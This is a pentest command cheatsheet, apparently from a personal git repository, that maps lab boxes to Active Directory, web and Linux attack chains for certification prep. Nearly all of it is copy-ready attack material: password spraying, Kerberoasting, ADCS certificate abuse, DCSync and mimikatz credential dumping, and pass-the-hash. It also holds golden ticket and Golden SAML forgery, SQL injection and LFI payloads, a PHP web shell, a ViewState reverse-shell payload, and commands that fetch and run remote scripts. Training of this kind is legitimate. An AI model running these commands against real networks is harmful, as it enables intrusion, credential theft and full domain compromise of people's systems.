daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

most-used-commands.md (28484B)


      1 ---
      2 title: "Most Used Commands"
      3 description: "CPTS companion guide: Most Used Commands — copy-ready methodology and commands."
      4 category: pentest-workflow
      5 subcategory: "Companion Guides"
      6 order: 23
      7 tags: ["command-reference", "cheatsheet", "cpts-prep", "ad", "adcs", "kerberos", "enumeration", "privilege-escalation", "cpts", "pentest-workflow"]
      8 tools: ["nmap", "rustscan", "netexec", "bloodhound-ce-python", "certipy", "impacket", "bloodyAD", "evil-winrm", "hashcat"]
      9 difficulty: intermediate
     10 updated: "2026-07-18"
     11 source: "vault:Pentest Attack Flow/Companion Guides/Most-Used-Commands.md"
     12 ---
     13 ---
     14 
     15 > [!abstract] `> ABOUT_THIS_NOTE`
     16 > Master command library merged from my scanning cheatsheet and AD field notes. Ordered as an **attack workflow** first, then a per-tool reference. Built around the CPTS-prep box list (mostly Windows/AD), so Kerberos, ADCS and ACL abuse lead. For the phased methodology and decision trees, see **[Attack-Flow-Guide](/sheets/pentest-workflow/attack-flow-guide)**. Set `export TARGET=`, `export IP=$TARGET`, `export DC=dc01.domain.htb` and `export DOMAIN=domain.htb` before starting.
     17 
     18 ---
     19 
     20 ## // ATTACK_WORKFLOW
     21 
     22 The order I actually work a box. Windows/AD path is the spine, web/Linux detours branch off recon.
     23 
     24 <figure class="flow plate corners">
     25   <figcaption class="flow__cap"><span class="flow__kind">Box attack workflow</span><span class="flow__dir">TD</span></figcaption>
     26   <div class="flow__body">
     27     <div class="flow__diagram" data-dir="td">
     28       <div class="flow-rank"><div class="flow-node is-entry">0. SETUP<span class="sub">hosts + krb5 + ntpdate</span></div></div>
     29       <div class="flow-edge"></div>
     30       <div class="flow-rank"><div class="flow-node">1. RECON<span class="sub">rustscan / nmap</span></div></div>
     31       <div class="flow-edge"></div>
     32       <div class="flow-rank"><div class="flow-node is-decision">Attack surface?</div></div>
     33       <div class="flow-branches">
     34         <div class="flow-lane"><div class="flow-edge"><span class="flow-edge__label">AD / SMB / LDAP</span></div><div class="flow-node">2. AD ENUM<span class="sub">netexec + bloodhound-ce-python</span></div></div>
     35         <div class="flow-lane"><div class="flow-edge"><span class="flow-edge__label">Web</span></div><div class="flow-node">Web: ffuf / sqlmap / LFI</div></div>
     36         <div class="flow-lane"><div class="flow-edge"><span class="flow-edge__label">Linux svc</span></div><div class="flow-node">Linux: NFS / DNS / redis</div></div>
     37       </div>
     38       <div class="flow-join"></div>
     39       <div class="flow-rank"><div class="flow-node">3. FOOTHOLD CREDS<span class="sub">kerberoast / asrep / shares / spray</span></div></div>
     40       <div class="flow-edge"></div>
     41       <div class="flow-rank"><div class="flow-node">4. BLOODHOUND PATH<span class="sub">ACLs: GenericWrite / ForceChangePW</span></div></div>
     42       <div class="flow-edge"></div>
     43       <div class="flow-rank"><div class="flow-node">5. ESCALATE ID<span class="sub">shadow creds / gMSA / DPAPI / recycle bin</span></div></div>
     44       <div class="flow-edge"></div>
     45       <div class="flow-rank"><div class="flow-node is-decision">Path to DA?</div></div>
     46       <div class="flow-branches">
     47         <div class="flow-lane"><div class="flow-edge"><span class="flow-edge__label">ADCS</span></div><div class="flow-node">6a. CERTIPY<span class="sub">ESC1 / ESC8 / ESC15 / ESC16</span></div></div>
     48         <div class="flow-lane"><div class="flow-edge"><span class="flow-edge__label">Delegation</span></div><div class="flow-node">6b. RBCD / constrained<span class="sub">impacket getST</span></div></div>
     49         <div class="flow-lane"><div class="flow-edge"><span class="flow-edge__label">Creds/priv</span></div><div class="flow-node">6c. SeImpersonate / SeDebug<span class="sub">secretsdump / DCSync</span></div></div>
     50       </div>
     51       <div class="flow-join"></div>
     52       <div class="flow-rank"><div class="flow-node is-goal">7. DOMAIN ADMIN<span class="sub">evil-winrm / psexec</span></div></div>
     53     </div>
     54   </div>
     55 </figure>
     56 
     57 > [!tip] (what to do first, then again)
     58 > 1. **Every time you get new creds or a new hash** → re-run BloodHound as that principal, re-spray across SMB/WinRM, and re-check ADCS with certipy. New identity = new outbound control.
     59 > 2. **Every shell** → run the "First 5 Commands" for the OS immediately (`whoami /all` / `sudo -l`).
     60 > 3. **Kerberos error?** → 99% clock skew. Re-run `ntpdate`. See Phase 0.
     61 > 4. **Stuck on privesc** → enumerate again with the *new* context; upload BloodHound/winPEAS/linPEAS; check `whoami /priv`.
     62 
     63 ---
     64 
     65 ## // MACHINE_→_TECHNIQUE_INDEX
     66 
     67 Quick map of the CPTS-prep list to the primary skill each one drills (so I know which section to revise).
     68 
     69 | Box | OS · Diff | Primary technique(s) | Key tools |
     70 |-----|-----------|----------------------|-----------|
     71 | **Fluffy** | Win · Easy | CVE-2025-24071 `.library-ms` → NetNTLMv2 → GenericWrite → shadow creds → **ESC16** | responder, hashcat, bloodyAD, certipy |
     72 | **Jeeves** | Win · Med | Jenkins RCE → KeePass `.kdbx` crack → PtH → ADS root | keepass2john, psexec |
     73 | **Trick** | Linux · Easy | DNS **AXFR** → SQLi auth bypass → LFI → **fail2ban** privesc | dig, sqlmap |
     74 | **Postman** | Linux · Easy | **Redis** unauth → SSH key write → Webmin RCE (CVE-2019-12840) | redis-cli, ssh2john |
     75 | **Pov** | Win · Med | LFI → web.config keys → **ViewState** deser → PSCredential → **SeDebug** | ysoserial.net |
     76 | **TombWatcher** | Win · Med | Kerberoast → **gMSA** → ForceChangePassword → **AD Recycle Bin** → **ESC15** | certipy, bloodyAD, gMSADumper |
     77 | **Media** | Win · Med | `.wax` **NTLM leak** → crack → junction point web write → **GodPotato** (SeImpersonate) | responder, GodPotato, FullPowers |
     78 | **VulnCicada** | Win · Med | NFS stickynote → **ESC8** → malicious DNS + **PetitPotam** → certipy relay | certipy, coercer, nfs |
     79 | **StreamIO** | Win · Med | **MSSQL SQLi** → LFI/RFI → ACL abuse → Firefox creds → **LAPS** read | sqlmap, bloodhound, nxc |
     80 | **Voleur** | Win · Med | Kerberos-only auth (ccache) → Kerberoast → **deleted object** recovery → **DPAPI** → NTDS | impacket-getTGT, secretsdump, dpapi |
     81 | **Administrator** | Win · Med | ACL chains → ForceChangePassword → GenericAll → **DCSync** | bloodyAD, secretsdump |
     82 | **Authority** | Win · Med | **Ansible Vault** crack → PWM LDAP intercept → **ESC1** → PassTheCert | ansible2john, certipy, passthecert |
     83 | **Craft** | Linux · Med | API abuse → Gogs source → python **eval** RCE → **Vault** SSH OTP | curl, jq |
     84 | **Redelegate** | Win · Hard | anon FTP → KeePass spray → ForceChangePassword → **constrained delegation** (SeEnableDelegation) → DCSync | keepass2john, impacket-getST |
     85 | **Snoopy** | Linux · Hard | DNS **AXFR** → LFI → BIND TSIG key → **nsupdate** → Mattermost reset → git/clamav CVE | dig, nsupdate |
     86 | **Ghost** | Win · Insane | vhost fuzz → **LDAP injection** → Gitea → RCE → gMSA → **Golden SAML** → forest trust golden ticket | ffuf, ticketer |
     87 
     88 > [!note] Pattern: 12 of 16 are Windows/AD. Master certipy (ESC1/8/15/16), BloodHound ACL abuse, Kerberos ticket handling, and delegation and you clear most of this list.
     89 
     90 ---
     91 
     92 ## // PHASE_0 — SETUP (do this first, every AD box)
     93 
     94 > [!warning] — the #1 Kerberos killer
     95 > Kerberos rejects auth if your clock differs from the DC by more than ~5 min. Sync **before** any Kerberos/certipy/getTGT step, and again if a box's time drifts.
     96 > ```bash
     97 > sudo ntpdate -u $TARGET          # classic, quickest
     98 > # if ntpdate is missing:
     99 > sudo apt install ntpdate -y
    100 > # modern alternatives:
    101 > sudo rdate -n $TARGET
    102 > sudo chronyd -q "server $TARGET iburst"
    103 > # verify skew vs DC:
    104 > nxc smb $TARGET | grep -i time
    105 > ```
    106 
    107 > [!terminal]+ Hosts file + Kerberos realm
    108 > ```bash
    109 > # Auto-populate /etc/hosts with DC + domain
    110 > sudo nxc smb $TARGET --generate-hosts-file /etc/hosts
    111 >
    112 > # Generate a matching krb5.conf (needed for Kerberos auth)
    113 > nxc smb $DC --generate-krb5-file krb5.conf
    114 > sudo cp krb5.conf /etc/krb5.conf
    115 >
    116 > # Manual fallback
    117 > echo "$TARGET  dc01.domain.htb domain.htb dc01" | sudo tee -a /etc/hosts
    118 > ```
    119 
    120 ```bash
    121 nxc smb $TARGET --generate-host-file hosts
    122 cat hosts | sudo tee -a /etc/hosts+
    123 ```
    124 
    125 ---
    126 
    127 ## // PHASE_1 — RECON & SCANNING
    128 
    129 > [!terminal]+ RustScan (preferred) then two-stage nmap
    130 > ```bash
    131 > # RustScan auto-feeds open ports into nmap
    132 > rustscan -a $IP -u 50000 -r 1-65535 -- -sCV -oA ./recon/target
    133 > # Windows / no-ping targets
    134 > rustscan -a $IP -u 50000 -r 1-65535 -t 3000 -b 1000 -- -Pn -sCV --max-retries 3 -T4
    135 >
    136 > # Two-stage nmap: discover ports, then deep scan
    137 > ports=$(nmap -p- --min-rate=1000 -T4 --open -oG - $IP | grep -oP '\d+(?=/open)' | paste -sd,)
    138 > nmap -p $ports -sCV -T4 -Pn $IP -oA ./recon/detailed
    139 >
    140 > # Vuln scripts (high-severity only)
    141 > nmap -sV --script "vuln,vulners" --script-args mincvss=7.0 -p $ports $IP -oA ./recon/vuln
    142 > ```
    143 
    144 > [!tip] UDP quick check (DNS/SNMP/NFS often matter): `sudo nmap -sU --top-ports 50 $IP`
    145 
    146 ---
    147 
    148 ## // PHASE_2 — ENUMERATION
    149 
    150 ### `> SMB`
    151 
    152 > [!terminal]+
    153 > ```bash
    154 > nxc smb $TARGET -u '' -p '' --shares            # null session
    155 > nxc smb $TARGET -u guest -p '' --shares
    156 > smbmap -H $TARGET -u user -p 'pass' -r          # recursive listing
    157 > smbclient //$TARGET/Share -U 'domain\user%pass'
    158 > smbclient -N -L //$TARGET                        # anon share list
    159 > nxc smb $TARGET -u user -p 'pass' -M spider_plus # loot files
    160 > ```
    161 
    162 ### `> LDAP / RID / users`
    163 
    164 > [!terminal]+
    165 > ```bash
    166 > nxc ldap $DC -u user -p 'pass' --users-export users.txt
    167 > nxc smb  $TARGET -u user -p 'pass' --rid-brute
    168 > ldapsearch -x -H ldap://$TARGET -b 'DC=domain,DC=htb' > ldap.txt
    169 > enum4linux-ng -A $TARGET
    170 > ```
    171 
    172 ### `> Kerberos user discovery`
    173 
    174 > [!terminal]+
    175 > ```bash
    176 > kerbrute userenum -d $DOMAIN --dc $DC /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
    177 > ```
    178 
    179 ### `> NFS (VulnCicada-style)`
    180 
    181 > [!terminal]+
    182 > ```bash
    183 > showmount -e $TARGET
    184 > sudo mount -t nfs $TARGET:/share /mnt/nfs -o nolock
    185 > ```
    186 
    187 ### `> BloodHound (run as EVERY new principal)`
    188 
    189 > [!terminal]+ bloodhound-ce-python (CE ingestor)
    190 > ```bash
    191 > bloodhound-ce-python -d $DOMAIN -u user -p 'pass' -ns $TARGET -c All --zip
    192 > # Kerberos auth instead of password:
    193 > bloodhound-ce-python -d $DOMAIN -u user -k -no-pass -ns $TARGET -c All --zip
    194 > # On-target collector (Windows):
    195 > #   .\SharpHound.exe -c All --outputdirectory C:\temp
    196 > ```
    197 > Then start the CE stack (`docker compose up`), upload the zip, mark owned, run **"Shortest paths from Owned"**.
    198 
    199 ---
    200 
    201 ## // PHASE_3 — CREDENTIAL ATTACKS (AD)
    202 
    203 ### `> Kerberoast + ASREPRoast`
    204 
    205 > [!terminal]+
    206 > ```bash
    207 > # Kerberoast (SPN accounts) → hashcat -m 13100
    208 > impacket-GetUserSPNs -request -dc-ip $DC "$DOMAIN/user:pass" -outputfile kerb.hash
    209 > # targeted (when you have GenericWrite over a user)
    210 > targetedKerberoast.py -v -d $DOMAIN -u user -p 'pass'
    211 >
    212 > # ASREPRoast (no pre-auth) → hashcat -m 18200
    213 > impacket-GetNPUsers $DOMAIN/ -dc-ip $DC -usersfile users.txt -no-pass
    214 > ```
    215 
    216 ### `> Password spray (after any new password)`
    217 
    218 > [!terminal]+
    219 > ```bash
    220 > nxc smb   $TARGET -u users.txt -p 'Season2025!' --continue-on-success
    221 > nxc winrm $TARGET -u users.txt -p 'Password1'   --continue-on-success
    222 > kerbrute passwordspray -d $DOMAIN --dc $DC users.txt 'Welcome1'
    223 > ```
    224 
    225 ### `> ACL abuse (bloodyAD)`
    226 
    227 > [!terminal]+
    228 > ```bash
    229 > # Add self to a group (GenericAll/GenericWrite over group)
    230 > bloodyAD --host $DC -d $DOMAIN -u user -p 'pass' add groupMember 'Target Group' user
    231 > # Force-change another user's password (ForceChangePassword)
    232 > bloodyAD --host $DC -d $DOMAIN -u user -p 'pass' set password targetuser 'NewP@ss123!'
    233 > # Grant DCSync (WriteDacl on domain)
    234 > bloodyAD --host $DC -d $DOMAIN -u user -p 'pass' add dcsync user
    235 > ```
    236 
    237 ### `> Shadow Credentials (GenericWrite over a user → NT hash)`
    238 
    239 > [!terminal]+
    240 > ```bash
    241 > certipy shadow auto -u user@$DOMAIN -p 'pass' -account targetuser
    242 > # -> returns TGT (.ccache) AND the NT hash for targetuser
    243 > ```
    244 
    245 ### `> gMSA password read (TombWatcher/Ghost)`
    246 
    247 > [!terminal]+
    248 > ```bash
    249 > nxc ldap $DC -u user -p 'pass' --gmsa
    250 > gMSADumper.py -u user -p 'pass' -d $DOMAIN
    251 > bloodyAD --host $DC -d $DOMAIN -u user -p 'pass' get object 'svc_gmsa$' --attr msDS-ManagedPassword
    252 > ```
    253 
    254 ### `> DPAPI (Voleur)`
    255 
    256 > [!terminal]+
    257 > ```bash
    258 > impacket-dpapi masterkey -file masterkey -sid <SID> -password 'pass'
    259 > impacket-dpapi credential -file <cred_blob> -key <decrypted_masterkey>
    260 > nxc smb $TARGET -u user -p 'pass' --dpapi
    261 > ```
    262 
    263 ### `> Deleted object / AD Recycle Bin (TombWatcher/Voleur)`
    264 
    265 > [!terminal]+
    266 > ```powershell
    267 > Get-ADObject -Filter 'isDeleted -eq $true' -IncludeDeletedObjects
    268 > Restore-ADObject -Identity <GUID>
    269 > ```
    270 
    271 ### `> Coercion (VulnCicada — feeds ESC8/relay)`
    272 
    273 > [!terminal]+
    274 > ```bash
    275 > coercer coerce -u user -p 'pass' -d $DOMAIN -t $DC -l $LHOST
    276 > petitpotam.py -u user -p 'pass' -d $DOMAIN $LHOST $DC
    277 > ```
    278 
    279 ### `> Delegation — RBCD & constrained (Redelegate)`
    280 
    281 > [!terminal]+
    282 > ```bash
    283 > # Constrained delegation w/ SeEnableDelegationPrivilege → S4U impersonation
    284 > impacket-getST -spn 'cifs/dc01.domain.htb' -impersonate administrator \
    285 >   -dc-ip $DC "$DOMAIN/FS01\$:MachinePass"
    286 > export KRB5CCNAME=administrator.ccache
    287 >
    288 > # RBCD (GenericWrite/GenericAll over a computer)
    289 > impacket-rbcd -delegate-from 'ATTACKER$' -delegate-to 'TARGET$' -action write \
    290 >   "$DOMAIN/user:pass"
    291 > ```
    292 
    293 ---
    294 
    295 ## // PHASE_6a — ADCS / CERTIPY (ESC1 / ESC8 / ESC15 / ESC16)
    296 
    297 > [!terminal]+ Find (update certipy first — ESC16 is recent)
    298 > ```bash
    299 > uv tool upgrade certipy-ad
    300 > certipy find -u user@$DOMAIN -p 'pass' -dc-ip $DC -vulnerable -stdout
    301 > # with a hash:
    302 > certipy find -u user@$DOMAIN -hashes :<NT> -dc-ip $DC -vulnerable -stdout
    303 > ```
    304 
    305 > [!terminal]+ ESC1 — enrollee supplies SAN (Authority)
    306 > ```bash
    307 > certipy req -u user@$DOMAIN -p 'pass' -dc-ip $DC -target $DC \
    308 >   -ca CA-NAME -template VulnTemplate -upn administrator@$DOMAIN
    309 > certipy auth -pfx administrator.pfx -dc-ip $DC
    310 > ```
    311 
    312 > [!terminal]+ ESC8 — NTLM relay to web enrollment (VulnCicada)
    313 > ```bash
    314 > certipy relay -target 'http://$DC' -template DomainController
    315 > # then coerce the DC (PetitPotam/coercer) → cert as DC$ → DCSync
    316 > ```
    317 
    318 > [!terminal]+ ESC15 (CVE-2024-49019) — v1 template app-policy injection (TombWatcher)
    319 > ```bash
    320 > certipy req -u user@$DOMAIN -p 'pass' -dc-ip $DC -ca CA-NAME -template WebServer \
    321 >   -upn administrator@$DOMAIN -application-policies 'Client Authentication'
    322 > ```
    323 
    324 > [!terminal]+ ESC16 — security extension disabled globally (Fluffy)
    325 > ```bash
    326 > # 1. hijack a controlled account's UPN to the target
    327 > certipy account -u ctrl@$DOMAIN -hashes :<NT> -user ca_svc -upn administrator update
    328 > # 2. request as that account
    329 > certipy req -u ca_svc -hashes :<NT> -dc-ip $DC -target $DC -ca CA-NAME -template User
    330 > # 3. restore UPN, then auth
    331 > certipy account -u ctrl@$DOMAIN -hashes :<NT> -user ca_svc -upn ca_svc@$DOMAIN update
    332 > certipy auth -pfx administrator.pfx -dc-ip $DC -domain $DOMAIN
    333 > ```
    334 
    335 > [!tip] PassTheCert (when the PFX can't get a TGT but can LDAP-bind — Authority)
    336 > ```bash
    337 > python3 passthecert.py -action ldap-shell -crt admin.crt -key admin.key -domain $DOMAIN -dc-ip $DC
    338 > ```
    339 
    340 ---
    341 
    342 ## // CRACKING
    343 
    344 > [!example]
    345 > | Hash | Mode | Command |
    346 > |---|---|---|
    347 > | NetNTLMv2 (Responder) | 5600 | `hashcat -m 5600 hash rockyou.txt` |
    348 > | Kerberoast TGS | 13100 | `hashcat -m 13100 kerb.hash rockyou.txt` |
    349 > | ASREPRoast | 18200 | `hashcat -m 18200 hash rockyou.txt` |
    350 > | NTLM (raw) | 1000 | `hashcat -m 1000 hash rockyou.txt` |
    351 > | NetNTLMv1 | 5500 | `hashcat -m 5500 hash rockyou.txt` |
    352 > | DCC2 (cached) | 2100 | `hashcat -m 2100 hash rockyou.txt` |
    353 > | KeePass | 13400 | `hashcat -m 13400 keepass.hash rockyou.txt` |
    354 > | Not sure? | — | `hashcat --identify hash` |
    355 
    356 > [!terminal]+ `*2john` extractors (Jeeves / Authority / Postman / Redelegate)
    357 > ```bash
    358 > keepass2john Database.kdbx > keepass.hash       # KeePass
    359 > ansible2john vault.yml       > vault.hash        # Ansible Vault
    360 > ssh2john id_rsa              > id_rsa.hash        # encrypted SSH key
    361 > john --wordlist=/usr/share/wordlists/rockyou.txt <hash>
    362 > ```
    363 
    364 > [!terminal]+ Python hash one-liners (NTLM etc)
    365 > ```bash
    366 > python3 -c "import hashlib; print(hashlib.new('md4', input('Pass: ').encode('utf-16le')).hexdigest())"  # NTLM
    367 > ```
    368 
    369 ---
    370 
    371 ## // SHELLS & LATERAL MOVEMENT
    372 
    373 > [!terminal]+ evil-winrm (password / hash / Kerberos ccache)
    374 > ```bash
    375 > evil-winrm -i $IP -u user -p 'pass'
    376 > evil-winrm -i $IP -u administrator -H <NT_HASH>          # pass-the-hash
    377 > export KRB5CCNAME=administrator.ccache
    378 > evil-winrm -i $IP -r $DOMAIN                              # Kerberos (needs FQDN in /etc/hosts)
    379 > # in-session: upload/download, Bypass-4MSI, services
    380 > ```
    381 
    382 > [!terminal]+ impacket remote exec (PtH-friendly)
    383 > ```bash
    384 > impacket-psexec  "$DOMAIN/administrator:pass@$IP"        # SYSTEM, noisy (service)
    385 > impacket-wmiexec -hashes :<NT> administrator@$IP          # stealthier
    386 > impacket-smbexec "$DOMAIN/administrator:pass@$IP"
    387 > impacket-atexec  -hashes :<NT> administrator@$IP "whoami" # via scheduler
    388 > ```
    389 
    390 > [!terminal]+ netexec spray & command
    391 > ```bash
    392 > nxc smb   $IP/24 -u user -p 'pass' -d $DOMAIN            # spray subnet
    393 > nxc smb   $IP    -d . -u administrator -H <NT>           # -d . = LOCAL account
    394 > nxc winrm $IP    -u user -p 'pass' -x "whoami"           # (Pwn3d!) = admin
    395 > ```
    396 
    397 ---
    398 
    399 ## // CREDENTIAL DUMPING
    400 
    401 > [!terminal]+ impacket-secretsdump (SAM / LSA / NTDS / DCSync)
    402 > ```bash
    403 > impacket-secretsdump "$DOMAIN/user:pass@$IP"                     # local SAM+LSA
    404 > impacket-secretsdump -hashes :<NT> administrator@$IP             # PtH
    405 > impacket-secretsdump "$DOMAIN/administrator:pass@$DC" -just-dc   # full DCSync (NTDS)
    406 > impacket-secretsdump "$DOMAIN/administrator:pass@$DC" -just-dc-user krbtgt
    407 > ```
    408 > Output format: `user:RID:LMhash:NThash:::` → the **NT hash** (last) is what you PtH.
    409 
    410 > [!terminal]+ mimikatz / meterpreter kiwi (on-target, needs SYSTEM)
    411 > ```
    412 > privilege::debug
    413 > sekurlsa::logonpasswords
    414 > lsadump::sam
    415 > lsadump::dcsync /user:domain\administrator
    416 > sekurlsa::pth /user:administrator /domain:domain.htb /ntlm:<NT> /run:cmd.exe
    417 > ```
    418 
    419 ---
    420 
    421 ## // WINDOWS PRIVESC
    422 
    423 > [!terminal]+ First 5 commands (run on every Windows shell)
    424 > ```powershell
    425 > whoami /all           # user, groups AND privileges (SeImpersonate/SeDebug/SeBackup)
    426 > net user; net localgroup administrators
    427 > systeminfo            # build + hotfixes + domain
    428 > ipconfig /all         # pivot subnets
    429 > whoami /priv
    430 > ```
    431 
    432 > [!tip]+ Privilege → exploit map
    433 > - **SeImpersonate** → GodPotato / PrintSpoofer (`FullPowers` first if svc account) — *Media*
    434 > - **SeDebug** → inject LSASS / meterpreter migrate — *Pov*
    435 > - **SeBackup / SeRestore** → read/write any file (dump SAM/NTDS)
    436 > - **SeEnableDelegation** → constrained delegation S4U — *Redelegate*
    437 > ```powershell
    438 > .\GodPotato-NET4.exe -cmd "cmd /c whoami"
    439 > .\PrintSpoofer64.exe -i -c powershell
    440 > ```
    441 
    442 > [!terminal]+ Web-specific footholds
    443 > ```bash
    444 > # ViewState deserialization (Pov): leak web.config keys via LFI, then:
    445 > ysoserial.exe -p ViewState -g TextFormattingRunProperties \
    446 >   --generator=<__VIEWSTATEGENERATOR> --validationkey=<KEY> --validationalg=SHA1 \
    447 >   -c "cmd" 
    448 > # LAPS read (StreamIO): 
    449 > nxc ldap $DC -u user -p 'pass' -M laps
    450 > ```
    451 
    452 ---
    453 
    454 ## // LINUX PRIVESC
    455 
    456 > [!terminal]+ First commands + quick wins
    457 > ```bash
    458 > whoami && id
    459 > sudo -l                                    # check FIRST
    460 > find / -perm -u=s -type f 2>/dev/null      # SUID → GTFOBins
    461 > cat /etc/crontab; ls -la /etc/cron.*
    462 > curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
    463 > # TTY upgrade
    464 > python3 -c 'import pty; pty.spawn("/bin/bash")'   # then Ctrl+Z; stty raw -echo; fg
    465 > ```
    466 
    467 > [!terminal]+ DNS attacks (Trick / Snoopy)
    468 > ```bash
    469 > dig axfr @$TARGET domain.htb                # zone transfer → subdomains
    470 > # nsupdate with leaked TSIG key (Snoopy)
    471 > nsupdate -k Kkey.private
    472 > > update add mail.domain.htb 60 A $LHOST
    473 > > send
    474 > ```
    475 
    476 ---
    477 
    478 ## // PIVOTING
    479 
    480 > [!terminal]+ ligolo-ng (preferred) / chisel
    481 > ```bash
    482 > # ligolo-ng (agentless-feel, TUN based)
    483 > sudo ip tuntap add user $USER mode tun ligolo; sudo ip link set ligolo up
    484 > ./proxy -selfcert                                  # attacker
    485 > ./agent -connect $LHOST:11601 -ignore-cert          # target
    486 >
    487 > # chisel reverse SOCKS
    488 > ./chisel server -p 8000 --reverse                   # attacker
    489 > ./chisel client $LHOST:8000 R:socks                 # target
    490 > ```
    491 
    492 ---
    493 
    494 ## // FILE TRANSFER
    495 
    496 > [!terminal]+
    497 > ```bash
    498 > # Attacker
    499 > python3 -m http.server 80
    500 > sudo impacket-smbserver SHARE . -smb2support -user t -password t
    501 > # Windows target
    502 > iwr -uri http://$LHOST/f.exe -outfile C:\temp\f.exe
    503 > certutil -urlcache -f http://$LHOST/f.exe C:\temp\f.exe
    504 > # Linux target
    505 > wget http://$LHOST/x -O /tmp/x; curl http://$LHOST/x -o /tmp/x
    506 > ```
    507 
    508 ---
    509 
    510 ## // DOCUMENTATION (asciinema)
    511 
    512 > [!terminal]+
    513 > ```bash
    514 > asciinema rec ~/captures/$(date +%Y%m%d)_$TARGET.cast
    515 > agg demo.cast demo.gif --idle-time-limit 2 --speed 2      # cast → gif
    516 > sha256sum captures/* screenshots/* > evidence_$(date +%Y%m%d).txt
    517 > ```
    518 
    519 ---
    520 
    521 ## // WEB EXPLOITATION
    522 
    523 > [!terminal]+ Recon (vhost + dirs + params)
    524 > ```bash
    525 > ffuf -u http://$IP -H "Host: FUZZ.domain.htb" -w /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -mc all -ac
    526 > ffuf -u "http://target/admin/?FUZZ=" -w /opt/SecLists/Discovery/Web-Content/burp-parameter-names.txt   # hidden params (StreamIO debug)
    527 > feroxbuster -u http://target -x php,aspx -w /opt/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txt   # lowercase for IIS
    528 > ```
    529 
    530 > [!terminal]+ SQL injection
    531 > ```bash
    532 > # auth bypass
    533 > username: admin' or 1=1;-- -
    534 > # sqlmap from a saved request (file read, dump)
    535 > sqlmap -r login.req --batch --technique B --level 5 --threads 10
    536 > sqlmap -r login.req --batch --file-read=/etc/passwd            # read files
    537 > sqlmap -r login.req --batch -D db -T users --dump
    538 > # MSSQL union creds dump (StreamIO)
    539 > ' union select 1,CONCAT(username,':',password),3,4,5,6 from users;-- -
    540 > ```
    541 
    542 > [!terminal]+ LFI / file-read / poisoning (Trick, StreamIO)
    543 > ```bash
    544 > # str_replace('../') bypass:
    545 > ?page=....//....//....//etc/passwd
    546 > # PHP filter source leak:
    547 > ?page=php://filter/convert.base64-encode/resource=index.php
    548 > # mail poisoning: swaks --to user --body '<?php system($_REQUEST["cmd"]); ?>' --server $IP
    549 > # then ?page=....//var/mail/user&cmd=id
    550 > ```
    551 
    552 > [!terminal]+ ViewState deserialization (Pov)
    553 > ```bash
    554 > ysoserial.exe -p ViewState -g WindowsIdentity --decryptionalg="AES" \
    555 >   --decryptionkey="<web.config key>" --validationalg="SHA1" --validationkey="<key>" \
    556 >   --path="/portfolio" -c "powershell -e <b64 revshell>"
    557 > # paste result into __VIEWSTATE POST param
    558 > ```
    559 
    560 > [!tip] Known-software footholds: Jenkins script console (`println "cmd /c whoami".execute().text`), Gitea creds → source + commit history for leaked creds/keys, Redis unauth SSH-key write, Webmin CVE-2019-12840, python `eval` API (Craft), LDAP injection (`*`/`*`, brute attributes).
    561 
    562 ---
    563 
    564 ## // MSSQL
    565 
    566 > [!terminal]+ Connect + enumerate + linked servers (Redelegate, Ghost, StreamIO)
    567 > ```bash
    568 > mssqlclient.py SQLGuest:pass@$DC                    # add -windows-auth for domain
    569 > netexec mssql $DC -u sa -p pass --local-auth        # spray, --local-auth for SQL logins
    570 > # in the shell:
    571 > enum_db ; enable_xp_cmdshell ; xp_cmdshell whoami
    572 > # capture NetNTLMv2 via xp_dirtree (run Responder first)
    573 > EXEC xp_dirtree '\\10.10.14.6\share'
    574 > # linked-server impersonation → sa → RCE (Ghost)
    575 > SELECT * FROM OPENQUERY("PRIMARY", 'select CURRENT_USER')
    576 > EXECUTE('EXECUTE AS LOGIN=''sa''; exec sp_configure "xp_cmdshell",1; reconfigure; exec xp_cmdshell "cmd"') AT [PRIMARY]
    577 > # RID-brute domain users through MSSQL (Redelegate) — see msf: auxiliary/admin/mssql/mssql_enum_domain_accounts
    578 > ```
    579 
    580 ---
    581 
    582 ## // ADFS GOLDEN SAML (Ghost)
    583 
    584 > [!terminal]+ As the ADFS gMSA service account
    585 > ```bash
    586 > ADFSDump.exe                     # dump token-signing key + private key + config
    587 > # format: private key -> binary, token key -> base64 -d
    588 > python ADFSpoof.py -b encrypted_token_signing_key.bin private_key.bin -s core.domain \
    589 >   saml2 --endpoint 'https://core.domain:8443/adfs/saml/postResponse' \
    590 >   --nameidformat 'urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress' \
    591 >   --nameid 'Administrator@domain' --rpidentifier 'https://core.domain:8443' \
    592 >   --assertions '<Attribute Name="...upn"><AttributeValue>Administrator@domain</AttributeValue></Attribute>'
    593 > # paste SAMLResponse into the /adfs/saml/postResponse POST
    594 > ```
    595 
    596 ---
    597 
    598 ## // CROSS-DOMAIN / FOREST (Ghost)
    599 
    600 > [!terminal]+ Trust ticket & golden ticket
    601 > ```bash
    602 > # dump trust account + krbtgt (as SYSTEM on child DC)
    603 > mimikatz "lsadump::dcsync /all /csv" exit
    604 > # forged inter-domain trust ticket (child -> parent Enterprise Admins)
    605 > ticketer.py -nthash <TRUST$ NT> -domain-sid <child SID> -domain child.dom \
    606 >   -extra-sid <parent-SID>-519 -spn krbtgt/parent.dom dummy
    607 > KRB5CCNAME=dummy.ccache getST.py -k -no-pass -spn cifs/dc01.parent.dom child.dom/dummy@parent.dom
    608 > # or golden ticket with Rubeus
    609 > Rubeus.exe golden /aes256:<krbtgt aes> /ldap /user:Administrator /sids:<parent-SID>-519 /ptt
    610 > ```
    611 
    612 ---
    613 
    614 ## // DNS ATTACKS (Trick, Snoopy)
    615 
    616 > [!terminal]+
    617 > ```bash
    618 > dig axfr domain.htb @$IP                          # zone transfer → subdomains
    619 > # dynamic update with leaked TSIG/rndc key
    620 > nsupdate -k rndc.key
    621 > > server $IP
    622 > > zone domain.htb
    623 > > update add mail.domain.htb 86400 A 10.10.14.6
    624 > > send
    625 > # add DNS record as any domain user (feeds Responder coercion — Ghost)
    626 > python dnstool.py -u domain\\user -k -a add -r bitbucket --zone domain.htb --data $LHOST -dns-ip $DC DC.domain.htb
    627 > ```
    628 
    629 ---
    630 
